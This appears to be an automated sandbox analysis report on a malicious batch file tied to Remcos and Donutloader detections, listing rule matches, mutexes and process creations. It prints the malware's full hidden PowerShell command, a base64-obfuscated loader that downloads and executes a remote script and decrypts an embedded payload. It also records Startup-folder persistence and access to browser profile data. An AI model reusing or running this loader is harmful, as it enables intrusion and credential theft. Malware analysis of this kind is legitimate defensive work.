                          Source: 0000001C.00000002.2537460873.0000000006013000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 00000045.00000002.4098617102.00000000058AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 0000001C.00000002.2539368391.00000000060B3000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 00000017.00000002.2388189406.00000000061C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: Process Memory Space: powershell.exe PID: 7400, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: Process Memory Space: powershell.exe PID: 7400, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                          Source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                          Source: Process Memory Space: powershell.exe PID: 1784, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: Process Memory Space: powershell.exe PID: 1784, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                          Source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                          Source: Process Memory Space: powershell.exe PID: 1720, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: Process Memory Space: powershell.exe PID: 1720, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                          Source: Process Memory Space: powershell.exe PID: 7980, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: Process Memory Space: powershell.exe PID: 7980, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                          Source: Process Memory Space: powershell.exe PID: 5440, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: Process Memory Space: powershell.exe PID: 5440, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                          Source: Process Memory Space: powershell.exe PID: 6304, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: Process Memory Space: powershell.exe PID: 6304, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                          Source: Process Memory Space: powershell.exe PID: 3628, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: Process Memory Space: powershell.exe PID: 3628, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                          Source: Process Memory Space: powershell.exe PID: 7240, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: Process Memory Space: powershell.exe PID: 7240, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                          Source: Process Memory Space: powershell.exe PID: 6492, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: Process Memory Space: powershell.exe PID: 6492, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                          Source: 10.2.powershell.exe.8ba0000.1.raw.unpack, jlmrt.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 23.2.powershell.exe.6a65940.0.raw.unpack, jlmrt.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 39.2.powershell.exe.6101378.0.raw.unpack, jlmrt.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 10.2.powershell.exe.8ba0000.1.raw.unpack, jlmrt.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: 10.2.powershell.exe.8ba0000.1.raw.unpack, jlmrt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: 23.2.powershell.exe.6a65940.0.raw.unpack, jlmrt.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: 23.2.powershell.exe.6a65940.0.raw.unpack, jlmrt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: 39.2.powershell.exe.6101378.0.raw.unpack, jlmrt.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: 39.2.powershell.exe.6101378.0.raw.unpack, jlmrt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winBAT@126/98@9/3
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,18_2_00410DE1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_0041208B FindResourceA,SizeofResource,LoadResource,LockResource,18_2_0041208B
                          Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\dwm.batJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:744:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2364:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5948:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2104:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5320:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7988:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5360:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:412:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5368:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5888:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2724:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1244:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3844:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fmo4jnc.ndj.ps1Jump to behavior
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\uowzo4rEa5.bat" "
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: HandleInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                          Source: powershell.exe, 0000000D.00000002.2284366833.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                          Source: powershell.exe, 0000000D.00000002.2284366833.0000000000400000.00000040.80000000.00040000.00000000.sdmp, powershell.exe, 00000011.00000002.2278264276.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                          Source: powershell.exe, 0000000D.00000002.2284366833.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                          Source: powershell.exe, 0000000D.00000002.2284366833.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                          Source: powershell.exe, 0000000D.00000002.2284366833.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                          Source: powershell.exe, 0000000D.00000002.2284366833.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                          Source: powershell.exe, 0000000D.00000002.2286118879.000000000469D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: powershell.exe, 0000000D.00000002.2284366833.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\uowzo4rEa5.bat" "
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\uowzo4rEa5.bat"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_82916eff.cmd" "
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_82916eff.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaU